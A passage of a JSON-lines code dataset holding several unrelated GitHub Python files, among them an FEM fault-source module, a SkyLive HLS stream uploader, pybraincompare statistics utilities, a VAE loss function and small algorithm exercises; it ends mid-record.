width/nw\n\n x = np.zeros(3)\n id = 0\n for i in range(nl):\n for j in range(nw):\n x[0] = sx + l[i]*math.cos(strike_rad) - w[j]*math.cos(dip_rad)*math.sin(strike_rad)\n x[1] = sy + l[i]*math.sin(strike_rad) + w[j]*math.cos(dip_rad)*math.cos(strike_rad)\n x[2] = sz + w[j]*math.sin(dip_rad)\n\n for element in elements:\n if element.dim == 3:\n is_inside,xi = element.check_inside(x)\n if is_inside:\n source = Source(id,strike,dip,rake,dl,dw,element.id,xi[0],xi[1],xi[2])\n source_list += [source]\n id += 1\n break\n\n\n return source_list\n\n\nclass Source:\n def __init__(self,id,strike,dip,rake,length,width,element_id,xi,eta,zeta):\n self.id = id\n self.element_id = element_id\n self.xi,self.eta,self.zeta = xi,eta,zeta\n\n self.strike = np.deg2rad(strike)\n self.dip = np.deg2rad(dip)\n self.rake = np.deg2rad(rake)\n self.length = length\n self.width = width\n\n self.set_strain_tensor()\n\n def print(self):\n print(self.id,\":\",self.dip,\",\",self.width)\n print(\" \",self.element_id,\",\",(self.xi,self.zeta))\n\n def set_strain_tensor(self):\n self.strain_tensor = np.zeros(6,dtype=np.float64)\n m0 = self.width * self.length\n\n # Mxx\n self.strain_tensor[0] = -m0*( math.sin(self.dip)*math.cos(self.rake)*math.sin(2*self.strike) \\\n + math.sin(2*self.dip)*math.sin(self.rake)*math.sin(self.strike)**2)\n # Myy\n self.strain_tensor[1] = m0*( math.sin(self.dip)*math.cos(self.rake)*math.sin(2*self.strike) \\\n - math.sin(2*self.dip)*math.sin(self.rake)*math.cos(self.strike)**2)\n # Mzz\n self.strain_tensor[2] = m0*math.sin(2*self.dip)*math.sin(self.rake)\n\n # Mxy\n self.strain_tensor[3] = m0*( math.sin(self.dip)*math.cos(self.rake)*math.cos(2*self.strike) \\\n + math.sin(2*self.dip)*math.sin(self.rake)*math.sin(2*self.strike)*0.5)\n # Myz\n self.strain_tensor[4] = -m0*( math.cos(self.dip)*math.cos(self.rake)*math.sin(self.strike) \\\n - math.cos(2*self.dip)*math.sin(self.rake)*math.cos(self.strike))\n # Mxz\n self.strain_tensor[5] = -m0*( math.cos(self.dip)*math.cos(self.rake)*math.cos(self.strike) \\\n + math.cos(2*self.dip)*math.sin(self.rake)*math.sin(self.strike))\n","repo_name":"HiroUgoto/3D_FEM","sub_path":"python/src/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73861155363","text":"import functools\nprint = functools.partial(print, flush=True)\nprint('Initializing...')\nimport argparse\nimport config\nimport logging\nimport os\nimport glob\nimport cv2\nimport requests\nimport shutil\nfrom siaskynet import Skynet\nfrom tabulate import tabulate\nfrom threading import Thread\nimport time\n\ndef touchDir(dir, strict = False):\n\tif (strict == True and os.path.isdir(dir)):\n\t\traise Exception('Folder already exists: ' + dir)\n\tif not os.path.isdir(dir):\n\t\tos.mkdir(dir)\n\ndef rmdir(dir):\n\tif os.path.isdir(dir):\n\t\tshutil.rmtree(dir)\n\ndef skynet_push(filePath, portal):\n\tlogging.debug('Uploading ' + str(filePath) + ' with ' + str(portal))\n\n\topts = type('obj', (object,), {\n\t\t'portal_url': portal,\n\t\t'timeout': 60,\n\t\t'timeout_seconds': 60\n\t})\n\n\ttry:\n\t\ttry:\n\t\t\treturn Skynet.upload_file(filePath, opts) \n\t\texcept TimeoutError:\n\t\t\tlogging.error('Uploading timeout with ' + str(portal))\n\t\t\treturn False\n\texcept:\n\t\tlogging.error('Uploading failed with ' + str(portal))\n\t\treturn False\n\ndef upload(filePath, fileId, length):\n\tglobal concurrent_uploads, filearr, keep_files\n\tstart_time = time.time()\n\tconcurrent_uploads += 1\n\tfilearr[fileId].status = 'uploading'\n\n\t# upload file until success\n\twhile True:\n\t\t# upload and retry if fails with backup portals\n\t\tfor upload_portal in config.upload_portals:\n\t\t\tskylink = skynet_push(filePath, upload_portal)\n\t\t\tif skylink != False:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tfilearr[fileId].status = 'uploading with backup portal'\n\n\t\tif (skylink != False and len(skylink) == 52):\n\t\t\tskylink = skylink.replace(\"sia://\", \"\")\n\t\t\tfilearr[fileId].skylink = skylink\n\t\t\tif filearr[fileId].status != 'share failed':\n\t\t\t\tfilearr[fileId].status = 'share queued'\n\t\t\tfilearr[fileId].uploadTime = round(time.time() - start_time)\n\t\t\tconcurrent_uploads -= 1\n\t\t\tif keep_files == False:\n\t\t\t\tos.remove(filePath)\n\t\t\treturn True\n\t\telse:\n\t\t\tlogging.error('Upload failed with all portals for ' + str(filePath))\n\t\t\tfilearr[fileId].status = 'queued for re-uploading'\n\t\t\ttime.sleep(10)\n\t\t\tfilearr[fileId].status = 're-uploading'\n\n\ndef get_length(filename):\n\tcap = cv2.VideoCapture(filename)\n\tfps = cap.get(cv2.CAP_PROP_FPS) # OpenCV2 version 2 used \"CV_CAP_PROP_FPS\"\n\tframe_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\tduration = frame_count/fps\n\treturn duration\n\ndef get_latest_m3u8(recordFolder):\n\tpattern = os.path.join(recordFolder, '*.m3u8')\n\tlist_of_files = glob.glob(pattern) # * means all if need specific format then *.csv\n\tif not list_of_files:\n\t\treturn False\n\tlatest_file = max(list_of_files, key=os.path.getctime)\n\treturn latest_file\n\ndef chech_ts(recordFolder):\n\tfor file in os.listdir(recordFolder):\n\t\tif file.endswith(\".ts\"):\n\t\t\treturn True\n\treturn False\n\ndef isPlaylistFinished(recordFolder):\n\tglobal stream_filename\n\tplaylistFile = os.path.join(recordFolder, stream_filename + \".m3u8\")\n\tif (os.stat(playlistFile).st_size == 0):\n\t\treturn False\n\twith open(playlistFile, 'r') as f:\n\t\tlines = f.read().splitlines()\n\t\tlast_line = lines[-1]\n\t\tif last_line == '#EXT-X-ENDLIST':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\ndef updateDisplay(filearr, symbols):\n\tprint_str = '\\n\\n\\n\\n\\n\\n\\n\\n\\n'\n\tprint_str += 'Status symbols:\\n'\n\tsymbarray = []\n\tidx = 0\n\t\n\tfor key, value in symbols.items():\n\t\tsymbarray.append([value, key])\n\t\tidx += 1\n\ttable = (tabulate(symbarray, headers=['symbol', 'status'], tablefmt='orgtbl'))\n\tprint_str += table + '\\n\\n\\n'\n\n\tfile = ['File']\n\tstatus = ['Status']\n\tlength = ['Length']\n\tuptime = ['Upload time']\n\tterminalColumns, terminalRows = shutil.get_terminal_size()\n\tshowRows = int(terminalColumns/7) - 3\n\tran = len(filearr) if (len(filearr) < showRows) else showRows\n\tfor i in range(ran):\n\t\tind = -ran+i\n\t\tsymbolCode = filearr[ind].status\n\t\tfile.append(filearr[ind].fileId)\n\t\tstatus.append(symbols[symbolCode])\n\t\tvideoLength = round(filearr[ind].length)\n\t\tif (videoLength == -1):\n\t\t\tlength.append('')\n\t\telse:\n\t\t\tlength.append(str(videoLength) + 's')\n\t\tuploadTime = filearr[ind].uploadTime\n\t\tif (uploadTime == -1):\n\t\t\tuptime.append('')\n\t\telse:\n\t\t\tuptime.append(str(uploadTime) + 's')\n\n\ttable = (tabulate([file, status, length, uptime], tablefmt='orgtbl'))\n\tprint_str += table\n\tprint(print_str)\n\ndef share(fileId, filearr):\n\tglobal m3u8_list_upload_token, is_first_chunk\n\tfilearr[fileId].status = 'sharing'\n\tpost = {\n\t\t'token': m3u8_list_upload_token,\n\t\t'url': filearr[fileId].skylink,\n\t\t'length': filearr[fileId].length,\n\t\t'is_first_chunk': is_first_chunk\n\t\t}\n\ttry:\n\t\tx = requests.post(config.m3u8_list_upload_path, data = post)\n\t\tif (x.text != 'ok'):\n\t\t\tlogging.error('Error: posting failed ' + str(x.text))\n\t\t\tfilearr[fileId].status = 'share failed'\n\t\t\treturn False\n\t\telse:\n\t\t\tfilearr[fileId].status = 'shared'\n\t\t\tis_first_chunk = 0\n\t\t\treturn True\n\texcept Exception as e:\n\t\tlogging.error('Error: posting failed ' + str(e))\n\t\tfilearr[fileId].status = 'share failed'\n\t\treturn False\n\n\ndef share_thread():\n\tglobal filearr\n\tlastSharedFileId = -1\n\t# check_share_queue(check_share_queue, filearr)\n\twhile True:\n\t\tnextToShare = lastSharedFileId + 1\n\t\tif filearr[nextToShare].status == 'share queued' or filearr[nextToShare].status == 'share failed':\n\t\t\tif share(nextToShare, filearr) == True:\n\t\t\t\tlastSharedFileId += 1\n\t\t\telse:\n\t\t\t\ttime.sleep(10)\n\t\ttime.sleep(0.2)\n\n\nclass VideoFile:\n\tdef __init__(self, fileId):\n\t\tself.fileId = fileId\n\t\tself.status = 'waiting for file'\n\t\tself.uploadTime = -1\n\t\tself.length = -1\n\t\tself.skylink = 'skylink'\n\tdef __str__(self):\n\t\treturn str(self.__dict__)\n\nnextStreamFilename = 0\nfilearr = [\n\t# file, status, upload time, length, skylink\n\tVideoFile(nextStreamFilename)\n]\nstream_filename = ''\n\ndef worker():\n\tglobal concurrent_uploads, projectPath, recordFolder, filearr, nextStreamFilename, stream_filename\n\n\tsymbols = {\n\t\t'waiting for file':\t\t\t\t' ',\n\t\t'upload queued':\t\t\t\t'.',\n\t\t'uploading':\t\t\t\t\t'↑',\n\t\t'uploading with backup portal':\t'↕',\n\t\t'queued for re-uploading':\t\t'↔',\n\t\t're-uploading':\t\t\t\t\t'↨',\n\t\t'share queued':\t\t\t\t\t'▒',\n\t\t'sharing':\t\t\t\t\t\t'▓',\n\t\t'shared':\t\t\t\t\t\t'█',\n\t\t'share failed':\t\t\t\t\t'x'\n\t}\n\ttouchDir(recordFolder)\n\n\tcntr = 0\n\twhile True:\n\t\tlatest_m3u8 = get_latest_m3u8(recordFolder)\n\t\tif not latest_m3u8:\n\t\t\tif not (chech_ts(recordFolder)):\n\t\t\t\tprint('Waiting for recording, no .m3u8 file found in ' + recordFolder + ' folder (%ds)' %(cntr))\n\t\t\telse:\n\t\t\t\tprint('Starting uploading... Waiting for first chunk and for .m3u8 file in ' + recordFolder + ' folder')\n\t\t\tcntr += 1\n\t\t\ttime.sleep(1)\n\t\telse:\n\t\t\tfiletime = os.path.getctime(latest_m3u8)\n\t\t\tnow = time.time()\n\t\t\tif now-60 > filetime:\n\t\t\t\tprint(\"We found a stream, but it's older than a minute (maybe it is an old recording). Please start (or restart) the recording into \" + recordFolder)\n\t\t\t\ttime.sleep(1)\n\t\t\telse:\n\t\t\t\t# Start uplaoding\n\t\t\t\tbreak\n\n\tstream_filename = os.path.basename(latest_m3u8).replace('.m3u8', '')\n\n\tThread(target=share_thread).start()\n\twhile True:\n\t\tnextFile = os.path.join(recordFolder, stream_filename + str(nextStreamFilename) + \".ts\")\n\t\tnextAfterFile = os.path.join(recordFolder, stream_filename + str(nextStreamFilename + 1) + \".ts\")\n\t\tupdateDisplay(filearr, symbols)\n\t\tif concurrent_uploads < 10 and ( os.path.isfile(nextAfterFile) or ( isPlaylistFinished(recordFolder) and os.path.isfile(nextFile) ) ):\n\t\t\tfilearr.append(VideoFile(nextStreamFilename + 1))\n\t\t\tfilearr[nextStreamFilename].status = 'upload queued'\n\t\t\tnextLen = get_length(nextFile)\n\t\t\tfilearr[nextStreamFilename].length = nextLen\n\t\t\tThread(target=upload, args=(nextFile, nextStreamFilename, nextLen)).start()\n\t\t\tnextStreamFilename += 1\n\t\telse:\n\t\t\ttime.sleep(1)\n\t\n\nconcurrent_uploads = 0\nprojectPath = os.path.expanduser( os.path.join('~', '.SkyLive'))\ntouchDir(projectPath)\nis_first_chunk = 1\n\nlogFile = os.path.join(projectPath, \"stream_hls.log\")\nlogging.basicConfig(filename=logFile,\n\tfilemode='a',\n\tformat='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n\tdatefmt='%H:%M:%S',\n\tlevel=logging.DEBUG)\nlogging.info('LOGGING STARTED')\n\nparser = argparse.ArgumentParser('Upload HLS (m3u8) live stream to SkyLive')\nparser.add_argument('--record_folder', help='Record folder, where m3u8 and ts files are (will be) located (default: record_here)')\nparser.add_argument('--token', help='Stream token generated by skylive.coolhd.hu')\nparser.add_argument('--keep_files', help='Keep video files on disk. If keep-files is false (default), every .ts video chunk will be removed after upload.')\nargs = parser.parse_args()\n\n\n# get recordFolder\nif (args.record_folder):\n\tif (os.path.isabs(args.record_folder)):\n\t\trecordFolder = args.record_folder\n\telse:\n\t\trecordFolder = os.path.join(projectPath, args.record_folder)\nelse:\n\trecordFolder = os.path.join(projectPath, \"record_here\")\n\nif (args.token):\n\tm3u8_list_upload_token = args.token\nelse:\n\twhile True:\n\t\tm3u8_list_upload_token = input(\"Enter stream token: \")\n\t\tif (m3u8_list_upload_token):\n\t\t\tbreak\n\nif (args.keep_files):\n\tkf_lower = args.keep_files.lower()\n\tif kf_lower == 'true' or kf_lower == 'yes' or kf_lower == 'y':\n\t\tkeep_files = True\n\telse:\n\t\tkeep_files = False\n\t\nworker()\n","repo_name":"DaWe35/SkyLive","sub_path":"stream_hls.py","file_name":"stream_hls.py","file_ext":"py","file_size_in_byte":8969,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"54"} +{"seq_id":"11815005878","text":"import dpdata\nimport numpy as np\nimport pandas as pd\nimport matplotlib\n\noutcar_data = dpdata.LabeledSystem(\"OUTCAR\")\n\n# 提取数据\ncoords = outcar_data[\"coords\"]\n\n# 获取三维数组的形状\noriginal_shape = coords.shape\n\n# 计算新的形状,将前两个维度合并为一个,保持第三个维度不变\nnew_shape = (original_shape[0] * original_shape[1], original_shape[2])\n\n# 使用reshape方法将三维数组变为二维数组\ntwo_dim_array = coords.reshape(new_shape)\n\nprint(\"原始三维数组:\")\nprint(coords)\nprint(\"\\n变为的二维数组:\")\nprint(two_dim_array)\nprint(two_dim_array.shape)\noutput_filename = 'output_angles.txt' \nwith open(output_filename, 'w') as file:\n for angle in two_dim_array:\n file.write(f'{angle:.2f}\\n')","repo_name":"xysun25/AIMD-ML","sub_path":"dpdata/.history/1_20231013171350.py","file_name":"1_20231013171350.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3281228362","text":"import sys\nsys.setrecursionlimit(10000)\nsys.stdin = open('input.txt')\n\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\ndef dfs(x, y):\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < N and 0 <= ny < M: # 땅을 나가지 않는 선에서만\n if land[nx][ny] == 1: # 돌면서 1이 있으면 0으로 바꾸고 그 부분을 또 재귀로 들어가기\n land[nx][ny] = 0\n dfs(nx, ny)\n\nT = int(input())\nfor tc in range(1, T+1):\n M, N, K = map(int, input().split())\n land = [[0] * M for _ in range(N)]\n\n for i in range(K): # 배추 위치 지정\n x, y = map(int, input().split())\n land[y][x] = 1\n\n cnt = 0\n for j in range(N): # 반복문을 돌면서 필요한 배추흰지렁이 마리 수 구하기\n for k in range(M):\n if land[j][k] == 1:\n dfs(j, k)\n cnt += 1\n print(cnt)\n","repo_name":"kellyjung5512/TIL","sub_path":"03_review_study/baekjoon/BJ_1012/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13916778205","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import ListView, TemplateView\nfrom ai.apps import AiConfig\n\n\nclass AiView(TemplateView):\n def get(self, request, prompt='Nothing...', *args, **kwargs):\n prompt = prompt\n response = AiConfig.co.generate(\n model='command-xlarge-nightly',\n prompt=prompt,\n max_tokens=40,\n temperature=0.6,\n stop_sequences=[\"--\"]\n )\n return HttpResponse(response)\n# Create your views here.\n","repo_name":"LANneeer/ai_cup","sub_path":"hackathon/ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13873041552","text":"'''\nmaths.py: part of pybraincompare package\nSimple math functions\n\n'''\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nfrom .mrutils import (\n apply_threshold,\n do_mask,\n generate_thresholds,\n resample_images_ref\n)\nfrom scipy.stats import pearsonr, spearmanr, norm, t\nimport numpy as np\nfrom . import maths\nimport pandas\nimport nibabel\nimport sys\nimport os\n\n\ndef percent_to_float(x):\n return old_div(float(x.strip('%')),100)\n\ndef calculate_correlation(images,\n mask=None,\n atlas=None,\n summary=False, \n corr_type=\"pearson\"):\n\n '''calculate_correlation\n Calculate a correlation between two images\n \n images: list nibabel.Nifti1Image objects\n list of 2 nibabel objects\n\n corr_type: str\n correlation type pearson or spearman [default pearson]\n\n atlas: pybraincompare.compare.atlas\n a pybraincompare atlas object [optional]\n\n Calls calculate_pairwise_correlation, or calculate_atlas_correlation,\n which work with vectors. If you do masking of images an atlas on your\n own, you can call these other functions directly to produce a single\n or regional correlation.\n\n If an atlas is supplied, will return a data frame as follows:\n \n summary: boolean\n If True, return only the regional labels with correlations\n If False, return entire dataframe \n '''\n if mask != None:\n masked = do_mask(images=images,mask=mask)\n\n # No mask means we include all voxels, including outside brain\n else:\n masked = np.vstack((np.array(images[0].get_data().flatten()),\n np.array(images[1].get_data().flatten())))\n\n # A return value of \"nan\" indicates that there was not overlap\n if np.isnan(masked).all():\n corr = np.nan\n\n else:\n # If we want a whole brain correlation score, (no atlas specified)\n if atlas == None:\n corr = calculate_pairwise_correlation(masked[0],\n masked[1],\n corr_type=corr_type)\n\n else: \n atlas_nii = nibabel.load(atlas.file)\n\n if not (atlas_nii.get_affine() == images[0].get_affine()).all(): \n atlas_nii, _ = resample_images_ref(images=atlas.file,\n reference=images[0],\n interpolation=\"nearest\")\n\n atlas_vector = do_mask(atlas_nii,mask=mask)[0]\n atlas_labels = ['\"%s\"' %(atlas.labels[str(int(x))].label) \n for x in atlas_vector]\n atlas_colors = ['\"%s\"' %(atlas.color_lookup[x.replace('\"',\"\")]) \n for x in atlas_labels]\n\n # Need to check here if we have overlap!\n\n if not np.isnan(atlas_vector).all():\n corr = calculate_atlas_correlation(image_vector1=masked[0],\n image_vector2=masked[1],\n atlas_vector=atlas_vector,\n atlas_labels=atlas_labels,\n atlas_colors=atlas_colors,\n corr_type=corr_type,\n summary=summary)\n else:\n corr = np.nan\n\n return corr\n\ndef calculate_pairwise_correlation(image_vector1,\n image_vector2,\n corr_type=\"pearson\",\n atlas_vector=None): \n\n '''calculate_pairwise_correlation\n Calculate a correlation value for two vectors\n \n image_vector1,image_vector2: vectors of equal length with image values\n \n corr_type: \n correlation type [default pearson]\n \n atlas_vector: \n single vector of region labels strings [optional]\n\n If an atlas_vector is supplied, returns dictionary with atlas labels\n If not, returns single correlation value\n '''\n\n correlations = dict()\n\n # If we have atlas labels, return vector with labels\n if atlas_vector is not None:\n labs = np.unique(atlas_vector)\n for l in labs:\n if corr_type == \"spearman\": \n corr,pval = spearmanr(image_vector1[np.where(atlas_vector == l)[0]],\n image_vector2[np.where(atlas_vector == l)[0]])\n correlations[str(int(l))] = corr\n elif corr_type == \"pearson\": \n corr,pval = pearsonr(image_vector1[np.where(atlas_vector == l)[0]],\n image_vector2[np.where(atlas_vector == l)[0]]) \n correlations[str(int(l))] = corr\n\n else:\n if corr_type == \"pearson\": \n corr,pval = pearsonr(image_vector1, image_vector2)\n correlations = corr\n elif corr_type == \"spearman\": \n corr,pval = spearmanr(image_vector1, image_vector2)\n correlations = corr \n return correlations\n\ndef calculate_atlas_correlation(image_vector1,\n image_vector2,\n atlas_vector,\n atlas_labels,\n atlas_colors,\n corr_type=\"pearson\",\n summary=False):\n\n '''calculate_atlas_correlation\n Return regional correlations from an atlas object:\n\n image_vector1,image_vector2: \n vectors of equal length with image values\n \n atlas_vector: \n vector of atlas labels same length as image vector\n \n corr_type: str\n pearson or spearman\n \n summary: boolean\n If True, return only the regional labels with correlations\n If False, return entire dataframe \n\n if summary == False (default):\n\n INPUT_DATA_1, INPUT_DATA_2: the values in the images\n ATLAS_DATA: the value (integer) in the atlas, used to match to name labels\n ATLAS_LABELS: region names extracted from the atlas.xml\n ATLAS_CORR: the regional correlation for some point in input data 1 or 2\n ATLAS_COLOR: a hex value to render in the final d3\n\n If summary == True\n returns only region labels and corresponding correlations\n '''\n\n df = pandas.DataFrame()\n df[\"INPUT_DATA_ONE\"] = image_vector1\n df[\"INPUT_DATA_TWO\"] = image_vector2\n df[\"ATLAS_DATA\"] = atlas_vector \n df[\"ATLAS_LABELS\"] = atlas_labels \n \n corrs = calculate_pairwise_correlation(image_vector1,image_vector2,\n atlas_vector=atlas_vector,\n corr_type=corr_type)\n\n df[\"ATLAS_CORR\"] = [corrs[str(int(x))] for x in atlas_vector]\n df[\"ATLAS_COLORS\"] = atlas_colors \n \n if summary == False: \n return df\n else:\n regional = df.copy()\n regional = regional.loc[:,regional.columns[3:5]]\n regional = regional.drop_duplicates()\n return regional\n \n\ndef do_multi_correlation(image_df,corr_type=\"pearson\"):\n '''comparison for an entire pandas data frame'''\n return image_df.corr(method=corr_type, min_periods=1)\n\n\ndef calc_rows_columns(ratio, n_images):\n '''from chrisfilo https://github.com/chrisfilo/mriqc'''\n rows = 1\n for _ in range(100):\n columns = math.floor(ratio * rows)\n total = rows * columns\n if total > n_images:\n break\n\n columns = math.ceil(ratio * rows)\n total = rows * columns\n if total > n_images:\n break\n rows += 1\n return rows, columns\n\ndef TtoZ(t_stat_map,output_nii,dof):\n '''TtoZ: \n for details see\n https://github.com/vsoch/TtoZ\n Also provided for command line.\n\n t_stat_map: \n file path to t stat image\n\n output_nii: \n output nifti file\n \n dof: \n degrees of freedom (typically number subjects - 2)\n\n '''\n print(\"Converting map %s to Z-Scores...\" %(t_stat_map))\n \n mr = nibabel.load(t_stat_map)\n data = mr.get_data()\n\n # Select just the nonzero voxels\n nonzero = data[data!=0]\n\n # We will store our results here\n Z = np.zeros(len(nonzero))\n\n # Select values less than or == 0, and greater than zero\n c = np.zeros(len(nonzero))\n k1 = (nonzero <= c)\n k2 = (nonzero > c)\n\n # Subset the data into two sets\n t1 = nonzero[k1]\n t2 = nonzero[k2]\n\n # Calculate p values for <=0\n p_values_t1 = t.cdf(t1, df = dof)\n z_values_t1 = norm.ppf(p_values_t1)\n\n # Calculate p values for > 0\n p_values_t2 = t.cdf(-t2, df = dof)\n z_values_t2 = -norm.ppf(p_values_t2)\n Z[k1] = z_values_t1\n Z[k2] = z_values_t2\n\n # Write new image to file\n empty_nii = np.zeros(mr.shape)\n empty_nii[mr.get_data()!=0] = Z\n Z_nii_fixed = nibabel.nifti1.Nifti1Image(empty_nii,\n affine=mr.get_affine(),\n header=mr.get_header())\n nibabel.save(Z_nii_fixed,output_nii)\n\n# From Chrisfilo alleninf\n\ndef nifti_file(string):\n if not os.path.exists(string):\n msg = \"%r does not exist\" % string\n raise argparse.ArgumentTypeError(msg)\n try:\n nii = nibabel.load(string)\n except IOError as e:\n raise argparse.ArgumentTypeError(str(e))\n except:\n msg = \"%r is not a nifti file\" % string\n raise argparse.ArgumentTypeError(msg)\n else:\n if len(nii.shape) == 4 and nii.shape[3] > 1:\n msg = \"%r is four dimensional\" % string\n raise argparse.ArgumentTypeError(msg)\n return string\n","repo_name":"vsoch/pybraincompare","sub_path":"pybraincompare/compare/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":9867,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"8585139017","text":"from functions import *\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nimport json\n\nquery = 'Widerrufsrecht bei Haustürgeschäften'\n\nwith open('articles_preprocessed.json') as json_file:\n docs = json.load(json_file)\n\n# TF-IDF-Matrix Dokumente\nvectorizer = TfidfVectorizer(sublinear_tf=True)\ntfidf_docs = vectorizer.fit_transform(docs.values())\nvocab = vectorizer.vocabulary_\n# svd = TruncatedSVD(n_components=100, n_iter=7, random_state=42)\n# svd.fit(tfidf_docs)\n# tfidf_docs_svd = svd.transform(tfidf_docs)\n\n# TF-IDF-Vektor Abfrage\npreprocessed_query = get_preprocessed_text(query)\ndict_query = {'query': preprocessed_query}\nvectorizer = TfidfVectorizer(vocabulary=vocab, sublinear_tf=True)\ntfidf_query = vectorizer.fit_transform(dict_query.values())\n# tfidf_query_svd = svd.transform(tfidf_query)\n\ncos_sim = cosine_similarity(tfidf_query, tfidf_docs)\nprint('TF-IDF: Kosinus-Ähnlichkeit zwischen Abfrage und Dokumenten')\nprint(cos_sim)\n\n# cos_sim_pca = cosine_similarity(tfidf_query_svd, tfidf_docs_svd)\n# print('TF-IDF: Kosinus-Ähnlichkeit zwischen Abfrage und Dokumenten (SVD)')\n# print(cos_sim_pca)","repo_name":"baltisberger/gyminf-projekt","sub_path":"evaluation_test.py","file_name":"evaluation_test.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18857721778","text":"\nimport torch\n\n### loss function =============================================================\ndef loss_fn(x_target, x_prediction, z_mu, z_logvar, z_prior_mu, z_prior_logvar, d_t, d_mu, d_cov):\n\n ### MSE loss --------------------------------------------------------------\n sigma_mse = 1.0\n mse_loss_t = 1.0 / sigma_mse**2 * torch.mean(torch.square(x_target - x_prediction))\n\n ### KL divergence loss z --------------------------------------------------\n klz_element = z_prior_logvar - z_logvar - 1. + (z_logvar.exp() + (z_mu - z_prior_mu).pow(2)) / (z_prior_logvar.exp()+1e-6)\n klz_loss_t = 0.5 * torch.mean(klz_element)\n\n ### smoothness loss -------------------------------------------------------\n dif_x = diff_fun(d_t, 2)\n dif_y = diff_fun(d_t, 3)\n\n n_dim = torch.Tensor.dim(d_t)\n dif_x_mean = torch.mean(dif_x, dim=[*range(1, n_dim)])\n dif_y_mean = torch.mean(dif_y, dim=[*range(1, n_dim)])\n smooth_loss_t = (torch.mean(dif_x_mean) + torch.mean(dif_y_mean)) / 2.\n\n ### KL divergence loss d --------------------------------------------------\n det_d_cov = d_cov[:,:,:,0,0]*d_cov[:,:,:,1,1] - d_cov[:,:,:,0,1]*d_cov[:,:,:,1,0]\n d_mu_expand = d_mu.permute(0,2,3,1).unsqueeze(-1)\n\n kld_element_1 = -torch.log(det_d_cov)\n kld_element_2 = d_cov[:,:,:,0,0] + d_cov[:,:,:,1,1]\n kld_element_3 = torch.matmul(d_mu_expand.permute(0,1,2,4,3), d_mu_expand).squeeze(-1).squeeze(-1)\n\n kld_element = kld_element_1 - 2.0 + kld_element_2 + kld_element_3\n kld_loss_t = 0.5 * torch.mean(kld_element)\n\n return mse_loss_t, klz_loss_t, smooth_loss_t, kld_loss_t\n\ndef diff_fun(y_in, k_dim):\n n_dim = torch.Tensor.dim(y_in)\n\n rp = [k_dim, *range(k_dim), *range(k_dim + 1, n_dim)]\n y = y_in.permute(rp)\n\n df = y[1:, ...] - y[:-1, ...]\n\n rn = [*range(1, k_dim+1), 0, *range(k_dim+1, n_dim)]\n df = df.permute(rn) # permute back\n\n df = df.pow(2)\n return df","repo_name":"alireza-hokmabadi/DragNet","sub_path":"utils/loss_function.py","file_name":"loss_function.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"33962790141","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport markov_2nd_order, frequency\nimport os \n\napp = Flask(__name__)\n\nhost = os.environ.get('MONGODB_URI', 'mongodb://localhost:27017/create-lryic-gen')\nclient = MongoClient(host=f'{host}?retryWrites=false')\ndb = client.get_default_database()\nlyric = db['lyric']\n\n\n@app.route('/')\ndef index():\n \"\"\"Return homepage\"\"\"\n lyric_list = {\n 'lyric' : markov_2nd_order.run_generator()\n }\n lyric_id = lyric.insert_one(lyric_list).inserted_id\n lyric_text = lyric.find_one({'_id': ObjectId(lyric_id)})['lyric'] \n return render_template('base.html', lyric_id = lyric_id, lyric_text = lyric_text)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=os.environ.get('PORT', 5000))","repo_name":"ysawiris/CS-1.2-Intro-Data-Structures","sub_path":"tweet_generator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33156161290","text":"# https://leetcode.com/problems/combinations/\n# Backtracking\n\nfrom typing import List\n\n\nclass Solution:\n\n def combine(self, n: int, k: int) -> List[List[int]]:\n tmp = []\n\n def _recursive(curr_idx: int, answer: List[int]):\n nonlocal k, tmp, n\n if len(tmp) == k:\n answer.append(tmp[:])\n return\n\n for x in range(curr_idx, n + 1):\n tmp.append(x)\n _recursive(x + 1, answer)\n tmp.pop()\n\n answer = []\n _recursive(1, answer)\n return answer\n","repo_name":"jyeoniii/algorithm","sub_path":"20201122/combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1223991748","text":"from .EntityEdge import EntityEdge\n\n# Abstract class representing entities governing data in the graph\nclass EntityNode:\n def __init__(self, name, dggraph):\n # Name, graph, and vertex instantiation\n self.name = name\n self.dggraph = dggraph\n self.other_entity = set()\n self.other_entity_edges = set()\n self.vertex = self.dggraph.add_node(self)\n\n def connect(self, other_ent, 